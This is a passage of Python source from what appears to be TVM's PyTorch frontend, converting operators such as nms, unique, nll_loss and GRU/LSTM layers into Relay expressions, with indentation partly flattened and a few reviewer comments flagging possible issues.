return _op.cast(inputs[0], "float32")
def bitwise_not(self, inputs, input_types):
data = inputs[0]
# The input tensor must be of integral or Boolean types.
# For bool tensors, it computes the logical NOT
if input_types[0] == "bool":
out = _op.logical_not(_op.cast(data, "bool"))
else:
out = _op.bitwise_not(_op.cast(data, "int"))
return out
def bitwise_xor(self, inputs, input_types):
lhs = inputs[0]
rhs = inputs[1]
lhs = _op.cast(lhs, "bool") if input_types[0] == "bool" else _op.cast(lhs, "int")
rhs = _op.cast(rhs, "bool") if input_types[1] == "bool" else _op.cast(rhs, "int")
return _op.bitwise_xor(lhs, rhs)
def logical_not(self, inputs, input_types):
data = _wrap_const(inputs[0])
return _op.logical_not(_op.cast(data, "bool"))
def logical_xor(self, inputs, input_types):
lhs = _op.cast(inputs[0], "bool")
rhs = _op.cast(inputs[1], "bool")
return _op.logical_xor(lhs, rhs)
def list_getitem(self, inputs, input_types):
return self.prelude.nth(inputs[0], _wrap_const(inputs[1]))
def list_len(self, inputs, input_types):
return self.prelude.length(inputs[0])
def type_as(self, inputs, input_types):
assert len(inputs) == 2
assert len(input_types) == 2
return _op.cast(inputs[0], input_types[1])
def gather(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
indices = inputs[2]
return _op.gather(data, axis, indices)
def add(self, inputs, input_types):
# add_ is overloaded for tensor add and list concat
if input_types[0] == "ListType":
return self.prelude.concat(inputs[0], inputs[1])
return self.make_elemwise("add")(inputs, input_types)
    def tensor_array_stack(self, inputs, input_types):
        """Stack a relay tensor array along a new leading axis (axis 0 only)."""
        dim = inputs[1]
        assert dim == 0, "stacking on a dynamic tensor list only supported on a first axis"
        tensor_array, shape = self.convert_to_tensor_array(inputs[0])
        # result has a dynamic leading dim (the number of list elements)
        stacked_shape = (Any(),) + shape
        stack = self.prelude.get_global_var_static("tensor_array_stack", "float32", shape)
        stacked = stack(tensor_array)
        # register static tensor-array ops for the stacked shape, then unwrap
        static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", stacked_shape)
        static_tensor_array_ops.register()
        get_tensor = self.prelude.get_global_var_static("tensor_get_data", "float32", stacked_shape)
        return get_tensor(stacked)
    def stack(self, inputs, input_types):
        """Convert aten::stack for both static python lists and List ADTs."""
        if isinstance(inputs[0], list):
            # a static python list of tensors
            dim = inputs[1]
            return _op.stack(inputs[0], dim)
        else:
            # List ADT case
            assert isinstance(inputs[0], _expr.Expr)
            ty = self.infer_type_with_prelude(inputs[0])
            list_ty = self.prelude.mod.get_global_type_var("List")
            msg = "The input list is expected to be List ADT"
            assert isinstance(ty, tvm.ir.TypeCall) and ty.func == list_ty, msg
            return self.tensor_array_stack(inputs, input_types)
def rsub(self, inputs, input_types):
data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
# TODO (t-vi): should this also be part of the type promotion?
alpha = _expr.const(float(inputs[2]))
# note: rsub means data0 and data1 swap places
return get_relay_op("subtract")(data1, alpha * data0)
def embedding(self, inputs, input_types):
weight = inputs[0]
indices = inputs[1]
return _op.take(weight, indices.astype("int32"), axis=0)
    def one_hot(self, inputs, input_types):
        """Convert aten::one_hot to relay one_hot (int32 output, depth axis last)."""
        indices = inputs[0].astype("int32")
        num_classes = inputs[1]
        if num_classes == -1:
            # torch infers num_classes from data in this case; we cannot
            msg = "Inferring the number of classes is not yet supported."
            raise NotImplementedError(msg)
        dtype = "int32"
        on_value = tvm.relay.const(1.0, dtype)
        off_value = tvm.relay.const(0.0, dtype)
        return _op.one_hot(indices, on_value, off_value, num_classes, -1, dtype)
def index(self, inputs, input_types):
data = inputs[0]
indices = inputs[1]
return _op.adv_index([data] + indices)
def meshgrid(self, inputs, input_types):
data = inputs[0]
return _op.meshgrid(data, indexing="ij")
    def nms(self, inputs, input_types):
        """Convert torchvision::nms to relay non_max_suppression."""
        boxes = inputs[0]
        scores = inputs[1]
        iou_threshold = inputs[2]
        # TVM NMS assumes score > 0
        scores = scores - _op.min(scores) + _op.const(1.0)
        num_boxes = _op.shape_of(scores)
        # PyTorch NMS doesn't have score_threshold, so no need to run get_valid_count
        indices = _op.transform.arange(_op.squeeze(num_boxes), dtype="int32")
        indices = _op.expand_dims(indices, 0, 1)
        # Generate data with shape (1, num_anchors, 5)
        scores = AttrCvt(op_name="expand_dims", extras={"axis": -1, "num_newaxis": 1})([scores], {})
        data = _op.concatenate([scores, boxes], -1)
        data = _op.expand_dims(data, 0, 1)
        # Perform Non-Maximum Suppression,
        # PyTorch NMS doesn't have parameter top_k and max_output_size
        score_index = 0
        top_k = max_out_size = -1
        nms_ret = get_relay_op("non_max_suppression")(
            data=data,
            valid_count=num_boxes,
            indices=indices,
            max_output_size=max_out_size,
            iou_threshold=iou_threshold,
            force_suppress=True,
            top_k=top_k,
            coord_start=1,
            score_index=score_index,
            id_index=-1,
            return_indices=True,
            invalid_to_bottom=False,
        )
        # squeeze the two outputs of nms for strided_slice
        size = get_relay_op("squeeze")(nms_ret[1], axis=[1])
        data_slice = get_relay_op("squeeze")(nms_ret[0], axis=[0])
        # strided slice to get the dynamic result
        ret = get_relay_op("strided_slice")(
            data_slice, begin=_expr.const([0]), end=size, slice_mode="size"
        )
        # in torchvision, indices from nms are int64
        return _op.cast(ret, "int64")
def logsumexp(self, inputs, input_types):
data = self.pytorch_promote_types(inputs[:1], input_types[:1])
dim_list = inputs[1]
keepdim = inputs[2] if len(inputs) > 2 else False
# dim is output of prim::ListConstruct, even if it is int in python code
assert isinstance(dim_list, list), "dim is expected to be a list"
return _op.logsumexp(data[0], axis=dim_list, keepdims=keepdim)
    def roi_align(self, inputs, input_types):
        """Convert torchvision::roi_align."""
        data = inputs[0]
        boxes = inputs[1]
        output_size = (inputs[3], inputs[4])
        spatial_scale = inputs[2]
        sample_ratio = inputs[5]
        aligned = False if len(inputs) < 7 else inputs[6]
        if aligned:
            # aligned=True shifts boxes by half a pixel (in input coordinates)
            boxes -= _expr.const(0.5 / spatial_scale)
        return _op.vision.roi_align(data, boxes, output_size, spatial_scale, sample_ratio)
    def deform_conv2d(self, inputs, input_types):
        """Convert torchvision::deform_conv2d."""
        data = inputs[0]
        weight = inputs[1]
        offset = inputs[2]
        # NOTE(review): inputs[3] is not consumed here (bias?) — confirm
        strides = (inputs[4], inputs[5])
        padding = (inputs[6], inputs[7])
        dilation = (inputs[8], inputs[9])
        groups = inputs[10]
        deformable_groups = inputs[11]
        weight_shape = self.infer_shape(weight)
        output_channels = weight_shape[0]
        kernel_size = (weight_shape[2], weight_shape[3])
        return _op.nn.deformable_conv2d(
            data,
            offset,
            weight,
            strides,
            padding,
            dilation,
            deformable_groups,
            groups,
            output_channels,
            kernel_size,
        )
def unbind(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
return unbind(data, axis)
def shape_as_tensor(self, inputs, input_types):
is_symbolic_shape = False
input_shape = self.infer_shape(inputs[0], self.prelude.mod)
for axis in input_shape:
if not isinstance(axis, (int, tvm.tir.IntImm)):
is_symbolic_shape = True
break
if is_symbolic_shape:
ret = _op.shape_of(inputs[0], dtype="int64")
else:
ret = _expr.const(np.array(input_shape), dtype="int64")
return ret
def logical_and(self, inputs, input_types):
lhs = _op.cast(inputs[0], "bool")
rhs = _op.cast(inputs[1], "bool")
return _op.logical_and(lhs, rhs)
def nonzero(self, inputs, input_types, is_numpy_style=False):
data = inputs[0]
ret = _op.transform.argwhere(data)
if is_numpy_style or (len(inputs) > 1 and inputs[1]):
return unbind(ret, 1)
return ret
    def nonzero_numpy(self, inputs, input_types):
        # NOTE(review): forwards with is_numpy_style=False; the tuple-style
        # output is still produced when inputs[1] is truthy inside nonzero().
        # Confirm this matches aten::nonzero_numpy expectations.
        return self.nonzero(inputs, input_types, is_numpy_style=False)
def scatter(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
index = inputs[2]
src = inputs[3]
return _op.transform.scatter(data, index, src, axis)
def index_put(self, inputs, input_types):
in_tensor = inputs[0]
indices = inputs[1]
values = inputs[2]
accumulate = inputs[3]
if not accumulate:
mode = "update"
else:
mode = "add"
# Combine array of index tensors into one index tensor with shape (N,_)
index_tensor = _op.stack(indices, axis=0)
return _op.transform.scatter_nd(in_tensor, index_tensor, values, mode)
    def scalar_tensor(self, inputs, input_types):
        """Convert aten::scalar_tensor: wrap a scalar as a typed relay const."""
        data = inputs[0]
        # torch dtype enum -> relay dtype string
        cast_map = {
            6: "float32",
            7: "float64",
            3: "int32",
            4: "int64",
        }
        type_key = inputs[1]
        if isinstance(data, _expr.Constant):
            # unwrap an existing constant to its python value before re-typing
            data = data.data.numpy().tolist()
        return _expr.const(data, cast_map[type_key])
def interpolate(self, inputs, input_types):
if isinstance(inputs[1], _expr.Expr):
out_size = inputs[1]
elif isinstance(inputs[1], list):
out_size = []
for i in [0, 1]:
size, _ = try_infer_value(
inputs[1][i],
lambda ret: ret.astype(np.int),
lambda: _op.expand_dims(inputs[1][i], axis=0),
)
out_size.append(size)
out_size = _op.concatenate(out_size, axis=0)
data = inputs[0]
align_corners = inputs[4]
method = inputs[3]
if method.startswith("nearest"):
method = "nearest_neighbor"
elif method[0:2] == "bi":
method = method[2:]
if method == "nearest_neighbor":
coord_trans = "asymmetric"
elif align_corners:
coord_trans = "align_corners"
else:
coord_trans = "half_pixel"
return _op.image.resize2d(data, out_size, "NCHW", method, coord_trans, cubic_alpha=-0.75)
def numel(self, inputs, input_types):
return _op.ndarray_size(inputs[0])
def empty(self, inputs, input_types):
shape = inputs[0]
return _op.zeros(shape, _convert_dtype_value(inputs[1]))
def bincount(self, inputs, input_types):
data = inputs[0]
weights = inputs[1]
input_type = self.infer_type(data).dtype
if input_type == "int64":
logging.warning(
"Casting an int64 input to int32, since we do not have int64 atomic add"
"needed for bincount yet."
)
data = _op.cast(data, "int32")
maximum = _op.max(data)
dim = maximum + _expr.const(1, dtype="int32")
if weights:
weight_type = self.infer_type(weights)
out_dtype = weight_type.dtype
updates = weights
else:
out_dtype = "int32"
updates = _op.ones_like(data)
counts = _op.zeros(_op.reshape(dim, [1]), out_dtype)
out = _op.scatter_add(counts, data, updates, axis=0)
if input_type == "int32":
# Torch always outputs int64 results for bincount
return _op.cast(out, "int64")
return out
def scatter_add(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
index = inputs[2]
src = inputs[3]
return _op.scatter_add(data, index, src, axis=axis)
def cumsum(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
dtype = inputs[2]
if inputs[2] is not None:
dtype = _convert_dtype_value(inputs[2])
return _op.cumsum(data, axis=dim, dtype=dtype)
def masked_fill(self, inputs, input_types):
mask = inputs[1]
value = _op.cast(_wrap_const(inputs[2]), input_types[0])
return _op.where(mask, value, inputs[0])
def masked_select(self, inputs, input_types):
mask = inputs[1]
indices = self.nonzero([mask], input_types, is_numpy_style=True)
return _op.adv_index([inputs[0]] + [indices[i] for i in range(indices.size)])
def sort(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
is_descending = inputs[2]
# pytorch sort returns both sorted indices and values
indices = _op.argsort(data, dim, not is_descending)
return _op.gather(data, dim, indices), indices
def argsort(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
is_descending = inputs[2]
return _op.argsort(data, dim, not is_descending)
def is_floating_point(self, inputs, input_types):
assert len(inputs) == 1
if isinstance(inputs[0], _expr.Expr):
input_type = self.infer_type(inputs[0]).dtype
else:
input_type = input_types[0]
is_float = input_type in ["float32", "float64", "float16", "bfloat16"]
return _expr.const(is_float)
    def unique(self, inputs, input_types):
        """Convert torch.unique via relay unique (always treated as sorted)."""
        assert len(inputs) == 4
        [data, is_sorted, return_inverse, return_counts] = inputs
        if not is_sorted:
            logging.warning("TVM always assumes sorted=True for torch.unique")
            is_sorted = True
        if return_counts:
            [unique, indices, inverse_indices, num_uniq, counts] = _op.unique(
                data, is_sorted=is_sorted, return_counts=True
            )
            # trim padded outputs to the actual number of unique values
            unique_sliced = _op.strided_slice(unique, begin=[0], end=num_uniq, slice_mode="size")
            counts_sliced = _op.strided_slice(counts, begin=[0], end=num_uniq, slice_mode="size")
            return (unique_sliced, inverse_indices, counts_sliced)
        else:
            [unique, indices, inverse_indices, num_uniq] = _op.unique(
                data, is_sorted=is_sorted, return_counts=False
            )
            unique_sliced = _op.strided_slice(unique, begin=[0], end=num_uniq, slice_mode="size")
            return (unique_sliced, inverse_indices)
    def nll_loss(self, inputs, input_types):
        """Convert aten::nll_loss; reduction code 0/1/other -> none/mean/sum."""
        assert len(inputs) == 5
        [predictions, targets, weights, reduction, ignore_index] = inputs
        num_class = self.infer_shape(predictions)[1]
        if reduction == 0:
            reduction = "none"
        elif reduction == 1:
            reduction = "mean"
        else:
            reduction = "sum"
        if weights is None:
            # default: all classes weighted equally
            weights = _op.full(_expr.const(1), (num_class,), dtype=input_types[0])
        return _op.nn.nll_loss(predictions, targets, weights, reduction, ignore_index)
    def flip(self, inputs, input_types):
        """Convert aten::flip via relay reverse.

        NOTE(review): only axis[0] is reversed here, while torch.flip accepts
        multiple dims — confirm multi-dim flips are handled or unsupported.
        """
        data = inputs[0]
        axis = inputs[1]
        return _op.transform.reverse(data, axis=axis[0])
    def bidir_gru_cell(
        self,
        input_seqs,
        weights_dicts,
    ):
        """
        Bidirectional GRU cell: run forward and backward passes and
        concatenate per-step outputs along the feature axis.
        Returns (per-step outputs, stacked final hidden states).
        """
        seq_len = len(input_seqs)
        forward_outputs, fw_H_t = gru_cell(
            input_seqs,
            **weights_dicts[0],
        )
        reverse_outputs, rev_H_t = gru_cell(
            input_seqs,
            **weights_dicts[1],
            backwards=True,
        )
        final_outputs = []
        for i in range(seq_len):
            # reverse-pass outputs are time-reversed; realign before concat
            final_outputs.append(
                _op.concatenate([forward_outputs[i], reverse_outputs[seq_len - 1 - i]], axis=-1)
            )
        return final_outputs, _op.stack([fw_H_t, rev_H_t], axis=0)
    def gru_layers(self, input_data, layer_weights_dicts, bidirectional, dropout_p=0.0):
        """
        Methods iterates layers for Stacked GRU.
        Returns (stacked per-step outputs, stacked final hidden states).
        """
        layers_num = len(layer_weights_dicts)
        # split input sequence to samples set
        input_seqs = unbind(input_data, 0)  # [seq_num, (batch, feature_size)]
        output_hiddens = []
        for i in range(layers_num):
            weights_dicts = layer_weights_dicts[i]
            # input_seqs shape = [seq_num, (batch, feature_size)] or
            # [seq_num, (batch, 2*feature_size)] for bidirectional
            if bidirectional:
                input_seqs, H_t = self.bidir_gru_cell(input_seqs, weights_dicts)
            else:
                input_seqs, H_t = gru_cell(input_seqs, **weights_dicts[0])
            output_hiddens.append(H_t)
            # TODO (vvchernov): in pytorch implementation train is also checked
            # see https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339
            # /aten/src/ATen/native/RNN.cpp#L1054
            if dropout_p != 0 and i < layers_num - 1:
                # for input in input_seqs:
                #     input = _op.dropout(input, dropout_p)
                raise NotImplementedError("Dropout for GRU has not been supported yet!")
        return _op.stack(input_seqs, 0), _op.stack(output_hiddens, 0)
    def gru(self, inputs, input_types):
        """
        Description of GRU in pytorch:
        https://pytorch.org/docs/stable/generated/torch.nn.GRU.html?highlight=gru#torch.nn.GRU
        Converts aten::gru by unpacking the flat weight list into per-layer
        (and per-direction) weight dicts and running the stacked GRU layers.
        """
        # TODO (vvchernov): support dropout
        assert len(inputs) == 9, "Input of size 9 is expected"
        # Unpack inputs, note that if optional and not provided then value will be None.
        _X = inputs[0]
        # _X shape (seq_num, batch, feature_size) or (batch, seq_num, feature_size)
        hidden_state = inputs[1]
        # Hidden state shape (hidden_layers_num, batch, hidden_size)
        _weights = inputs[2]
        # Wi layer[0] shape (3 * hidden_size, feature_size)
        # Wh layer[0] shape (3 * hidden_size, hidden_size)
        # Bi layer[0] shape (3 * hidden_size)
        # Bh layer[0] shape (3 * hidden_size)
        # Wi layer[>0] shape (3 * hidden_size, hidden_size * num_directions)
        # Wh layer[>0] shape (3 * hidden_size, hidden_size)
        # Bi layer[>0] shape (3 * hidden_size)
        # Bh layer[>0] shape (3 * hidden_size)
        # Scalar inputs
        has_biases = inputs[3]
        num_layers = inputs[4]
        dropout_p = inputs[5]  # dropout probability, if 0.0 it means there is no dropout
        # train = inputs[6]
        bidirectional = inputs[7]
        batch_first = inputs[8]
        num_directions = 1
        if bidirectional:
            num_directions = 2
        # Sanity-check that the flat weight list factors evenly.
        rsd = len(_weights) % num_layers
        assert rsd == 0, "The number of weights must be a multiple of the number of layers!"
        rsd = (len(_weights) / num_layers) % num_directions
        assert (
            rsd == 0
        ), "The number of weights in layer must be a multiple of the number of directions!"
        weights_num = int(len(_weights) / num_layers / num_directions)
        if has_biases:
            assert weights_num == 4, "The weights number in layer is expected equal to 4"
        else:
            assert weights_num == 2, "The weights number in layer is expected equal to 2"
        # Normalize to (seq_num, batch, feature_size) layout.
        X = _op.transpose(_X, (1, 0, 2)) if batch_first else _X
        # TODO (vvchernov): Which data type should be used? from input or weights?
        # Instead of it _infer_type(X).checked_type.dtype can be used
        X_dtype = input_types[0]
        X_shape = _infer_shape(X)  # (seq_num, batch, feature_size)
        hidden_size = int(_infer_shape(_weights[0])[0] / 3)
        batch_size = X_shape[1]
        # Initialize hidden states if not provided.
        layers_h = []
        hidden_layers_num = num_directions * num_layers
        if hidden_state is None:
            h_0 = _op.zeros((batch_size, hidden_size), X_dtype)
            for i in range(hidden_layers_num):
                layers_h.append(h_0)
        else:
            layers_h = unbind(hidden_state, 0)
        # Group the flat weight list into per-layer dicts keyed by gru_cell kwargs.
        layer_weights_dicts = []
        k = 0  # layer counter
        if has_biases:
            names = ["hidden_state", "w_inp", "w_hid", "b_inp", "b_hid"]
            if bidirectional:
                rsd = len(_weights) % (2 * weights_num)
                assert rsd == 0, "got an incorrect number of GRU weights"
                for i in range(0, len(_weights), 2 * weights_num):
                    fw_tensors = [layers_h[2 * k], *_weights[i : i + 4]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    j = i + weights_num
                    rev_tensors = [layers_h[2 * k + 1], *_weights[j : j + 4]]
                    rev_weights_dict = dict(zip(names, rev_tensors))
                    layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
                    k += 1
            else:
                assert len(_weights) % weights_num == 0, "got an incorrect number of GRU weights"
                for i in range(0, len(_weights), weights_num):
                    fw_tensors = [layers_h[k], *_weights[i : i + 4]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    layer_weights_dicts.append([fw_weights_dict])
                    k += 1
        else:
            names = ["hidden_state", "w_inp", "w_hid"]
            if bidirectional:
                rsd = len(_weights) % (2 * weights_num)
                assert rsd == 0, "got an incorrect number of GRU weights"
                for i in range(0, len(_weights), 2 * weights_num):
                    fw_tensors = [layers_h[2 * k], *_weights[i : i + 2]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    j = i + weights_num
                    rev_tensors = [layers_h[2 * k + 1], *_weights[j : j + 2]]
                    rev_weights_dict = dict(zip(names, rev_tensors))
                    layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
                    k += 1
            else:
                assert len(_weights) % weights_num == 0, "got an incorrect number of GRU weights"
                for i in range(0, len(_weights), weights_num):
                    fw_tensors = [layers_h[k], *_weights[i : i + 2]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    layer_weights_dicts.append([fw_weights_dict])
                    k += 1
        assert (
            len(layer_weights_dicts) == num_layers and k == num_layers
        ), "For stacked GRU number of weights sets should be the same as number of layers!"
        output, out_hidden_state = self.gru_layers(
            X,
            layer_weights_dicts,
            bidirectional,
            dropout_p=dropout_p,
        )
        # output shape = (seq_num, batch, hidden_size) or
        # (seq_num, batch, 2*feature_size) for bidirectional
        if batch_first:
            output = _op.transpose(output, (1, 0, 2))
        return (output, out_hidden_state)
    def bidir_lstm_cell(
        self,
        input_seqs,
        weights_dicts,
    ):
        """
        Bidirectional LSTM cell: run forward and backward passes and
        concatenate per-step outputs along the feature axis.
        Returns (per-step outputs, (fw_H, fw_C), (rev_H, rev_C)).
        """
        seq_len = len(input_seqs)
        forward_outputs, fw_H_t, fw_C_t = lstm_cell(
            input_seqs,
            **weights_dicts[0],
        )
        reverse_outputs, rev_H_t, rev_C_t = lstm_cell(
            input_seqs,
            **weights_dicts[1],
            backwards=True,
        )
        final_outputs = []
        for i in range(seq_len):
            # reverse-pass outputs are time-reversed; realign before concat
            final_outputs.append(
                _op.concatenate([forward_outputs[i], reverse_outputs[seq_len - 1 - i]], axis=-1)
            )
        return final_outputs, (fw_H_t, fw_C_t), (rev_H_t, rev_C_t)
def lstm_layers(self, input_data, layer_weights_dicts, bidirectional, dtype, dropout_p=0.0):
"""
Methods iterates layers for Stacked LSTM
"""
layers_num = len(layer_weights_dicts)
# split input sequence to samples set
input_seqs = unbind(input_data, 0) # [seq_num, (batch, feature_size)]
output_hiddens = []
for i in range(layers_num):
weights_dicts = layer_weights_dicts[i]
# input_seqs shape = [seq_num, (batch, feature_size)] or
# [seq_num, (batch, 2*feature_size)] for bidirectional
if bidirectional:
input_seqs, H_t, C_t = self.bidir_lstm_cell(input_seqs, weights_dicts)
else:
input_seqs, H_t, C_t = lstm_cell(input_seqs, **weights_dicts[0])
output_hiddens.append((H_t, C_t))
# TODO (vvchernov): in pytorch implementation train is also checked
# see https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339
# /aten/src/ATen/native/RNN.cpp#L1054
if dropout_p != 0 and i < layers_num - 1:
# for input in input_seqs:
# input = _op.dropout(input, dropout_p)
raise NotImplementedError("Dropout for LSTM has not been supported yet!")
final_hiddens = []
if bidirectional:
for output_hidden in output_hiddens:
final_hiddens.append(output_hidden[0])
final_hiddens.append(output_hidden[1])
else:
final_hiddens = output_hiddens
return _op.stack(input_seqs, 0), final_hiddens
    def lstm(self, inputs, input_types):
        """Convert aten::lstm to a stack of Relay LSTM layers.

        Description of LSTM in pytorch:https://pytorch.org/docs/stable/generated/torch.nn.LSTM.html
        Native implementation for torch version less than 1.8.0 (projection is unsupported):
        https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339/aten/ \
        src/ATen/native/RNN.cpp#L1396
        Native implementation for torch version from 1.8.0 and higher (projection is supported):
        https://github.com/pytorch/pytorch/blob/master/aten/src/ATen/native/RNN.cpp#L1483

        Returns a tuple (output, h_n, c_n) mirroring PyTorch's aten::lstm
        return values.
        """
        # TODO (vvchernov): support dropout
        assert len(inputs) == 9, "Input of size 9 is expected"
        # Unpack inputs, note that if optional and not provided then value will be None.
        _X = inputs[0]
        # _X shape (seq_num, batch, feature_size) or (batch, seq_num, feature_size)
        hidden_states = inputs[1]
        assert len(hidden_states) == 2, "lstm expects two hidden states"
        h_0 = hidden_states[0]
        c_0 = hidden_states[1]
        # H0 shape (hidden_layers_num, batch, proj_size) if projection
        # else (hidden_layers_num, batch, hidden_size)
        # C0 shape (hidden_layers_num, batch, hidden_size)
        _weights = inputs[2]
        # Flat list of per-layer (and per-direction) weight tensors:
        # If no projection
        # Wi layer[0] shape (4 * hidden_size, feature_size)
        # Wh layer[0] shape (4 * hidden_size, hidden_size)
        # Bi layer[0] shape (4 * hidden_size)
        # Bh layer[0] shape (4 * hidden_size)
        # Wi layer[>0] shape (4 * hidden_size, hidden_size * num_directions)
        # Wh layer[>0] shape (4 * hidden_size, hidden_size)
        # Bi layer[>0] shape (4 * hidden_size)
        # Bh layer[>0] shape (4 * hidden_size)
        # If projection
        # Wi layer[0] shape (4 * hidden_size, feature_size)
        # Wh layer[0] shape (4 * hidden_size, proj_size)
        # Bi layer[0] shape (4 * hidden_size)
        # Bh layer[0] shape (4 * hidden_size)
        # P layer[0] shape (proj_size, hidden_size)
        # Wi layer[>0] shape (4 * hidden_size, proj_size * num_directions)
        # Wh layer[>0] shape (4 * hidden_size, proj_size)
        # Bi layer[>0] shape (4 * hidden_size)
        # Bh layer[>0] shape (4 * hidden_size)
        # P layer[>0] shape (proj_size, hidden_size)
        # Scalar inputs
        has_biases = inputs[3]
        num_layers = inputs[4]
        dropout_p = inputs[5]  # dropout probability, if 0.0 it means there is no dropout
        # train = inputs[6]
        bidirectional = inputs[7]
        batch_first = inputs[8]
        num_directions = 1
        if bidirectional:
            num_directions = 2
        # Sanity-check that the flat weight list divides evenly over
        # layers and directions.
        rsd = len(_weights) % num_layers
        assert rsd == 0, "The number of weights must be a multiple of the number of layers!"
        rsd = (len(_weights) / num_layers) % num_directions
        assert (
            rsd == 0
        ), "The number of weights in layer must be a multiple of the number of directions!"
        # Detect projection (LSTMP) from the per-layer weight count:
        # 5 (with biases) or 3 (without) means an extra projection matrix.
        has_proj = False
        proj_size = 0
        weights_num = int(len(_weights) / num_layers / num_directions)
        if has_biases:
            if weights_num == 5:
                has_proj = True
                proj_size = _infer_shape(_weights[4])[0]
            else:
                assert weights_num == 4, "The weights number in layer is expected equal to 4"
        else:
            if weights_num == 3:
                has_proj = True
                proj_size = _infer_shape(_weights[2])[0]
            else:
                assert weights_num == 2, "The weights number in layer is expected equal to 2"
        # Normalize to (seq_num, batch, feature_size) layout internally.
        X = _op.transpose(_X, (1, 0, 2)) if batch_first else _X
        # TODO (vvchernov): Which data type should be used? from input or weights?
        # Instead of it _infer_type(X).checked_type.dtype can be used
        X_dtype = input_types[0]
        X_shape = _infer_shape(X)  # (seq_num, batch, feature_size)
        # NOTE(review): true division leaves hidden_size as a float here;
        # confirm downstream shape consumers accept that.
        hidden_size = _infer_shape(_weights[0])[0] / 4
        batch_size = X_shape[1]
        # Initialize hidden states if not provided.
        layers_h = []
        layers_c = []
        hidden_layers_num = num_directions * num_layers
        if h_0 is None:
            if has_proj:
                h_0 = _op.zeros((batch_size, proj_size), X_dtype)
            else:
                h_0 = _op.zeros((batch_size, hidden_size), X_dtype)
            for i in range(hidden_layers_num):
                layers_h.append(h_0)
        else:
            layers_h = unbind(h_0, 0)
        if c_0 is None:
            c_0 = _op.zeros((batch_size, hidden_size), X_dtype)
            for i in range(hidden_layers_num):
                layers_c.append(c_0)
        else:
            layers_c = unbind(c_0, 0)
        # Group the flat weight list into one dict per direction per layer,
        # keyed by the lstm_cell keyword-argument names.
        layer_weights_dicts = []
        k = 0  # layer counter
        if has_biases:
            names = ["hidden_state", "cell_state", "w_inp", "w_hid", "b_inp", "b_hid"]
            if bidirectional:
                rsd = len(_weights) % (2 * weights_num)
                assert rsd == 0, "got an incorrect number of LSTM weights"
                for i in range(0, len(_weights), 2 * weights_num):
                    fw_tensors = [layers_h[2 * k], layers_c[2 * k], *_weights[i : i + 4]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    if has_proj:
                        fw_weights_dict["proj"] = _weights[i + 4]
                    j = i + weights_num
                    rev_tensors = [layers_h[2 * k + 1], layers_c[2 * k + 1], *_weights[j : j + 4]]
                    rev_weights_dict = dict(zip(names, rev_tensors))
                    if has_proj:
                        rev_weights_dict["proj"] = _weights[j + 4]
                    layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
                    k += 1
            else:
                assert len(_weights) % weights_num == 0, "got an incorrect number of LSTM weights"
                for i in range(0, len(_weights), weights_num):
                    fw_tensors = [layers_h[k], layers_c[k], *_weights[i : i + 4]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    if has_proj:
                        fw_weights_dict["proj"] = _weights[i + 4]
                    layer_weights_dicts.append([fw_weights_dict])
                    k += 1
        else:
            names = ["hidden_state", "cell_state", "w_inp", "w_hid"]
            if bidirectional:
                rsd = len(_weights) % (2 * weights_num)
                assert rsd == 0, "got an incorrect number of LSTM weights"
                for i in range(0, len(_weights), 2 * weights_num):
                    fw_tensors = [layers_h[2 * k], layers_c[2 * k], *_weights[i : i + 2]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    if has_proj:
                        fw_weights_dict["proj"] = _weights[i + 2]
                    j = i + weights_num
                    rev_tensors = [layers_h[2 * k + 1], layers_c[2 * k + 1], *_weights[j : j + 2]]
                    rev_weights_dict = dict(zip(names, rev_tensors))
                    if has_proj:
                        rev_weights_dict["proj"] = _weights[j + 2]
                    layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
                    k += 1
            else:
                assert len(_weights) % weights_num == 0, "got an incorrect number of LSTM weights"
                for i in range(0, len(_weights), weights_num):
                    fw_tensors = [layers_h[k], layers_c[k], *_weights[i : i + 2]]
                    fw_weights_dict = dict(zip(names, fw_tensors))
                    if has_proj:
                        fw_weights_dict["proj"] = _weights[i + 2]
                    layer_weights_dicts.append([fw_weights_dict])
                    k += 1
        assert (
            len(layer_weights_dicts) == num_layers and k == num_layers
        ), "For stacked LSTM number of weights sets should be the same as number of layers!"
        outputs = self.lstm_layers(
            X,
            layer_weights_dicts,
            bidirectional,
            dtype=X_dtype,
            dropout_p=dropout_p,
        )
        # output shape = (seq_num, batch, hidden_size) or
        # (seq_num, batch, 2*feature_size) for bidirectional
        output = outputs[0]
        # Split per-layer (H, C) pairs into the stacked h_n / c_n outputs.
        hy = []
        cy = []
        for hidden in outputs[1]:
            hy.append(hidden[0])
            cy.append(hidden[1])
        if batch_first:
            output = _op.transpose(output, (1, 0, 2))
        return (output, _op.stack(hy, 0), _op.stack(cy, 0))
def all_any_common(self, op, inputs, input_types):
dim = inputs[1]
keepdim = inputs[2]
if self.infer_type(inputs[0]).dtype != "bool":
# The input dtype can be uint8.
inp = _op.cast(inputs[0], "bool")
else:
inp = inputs[0]
return op(inp, axis=dim, keepdims=keepdim)
def searchsorted_common(self, sorted_sequence, values, out_int32, right):
dtype = "int32" if out_int32 else "int64"
values_shape = _infer_shape(values)
if len(values_shape) == 0:
values = _op.expand_dims(values, 0)
out = _op.searchsorted(sorted_sequence, values, right=right, dtype=dtype)
if len(values_shape) == 0:
return _op.squeeze(out)
return out
def searchsorted(self, inputs, input_types):
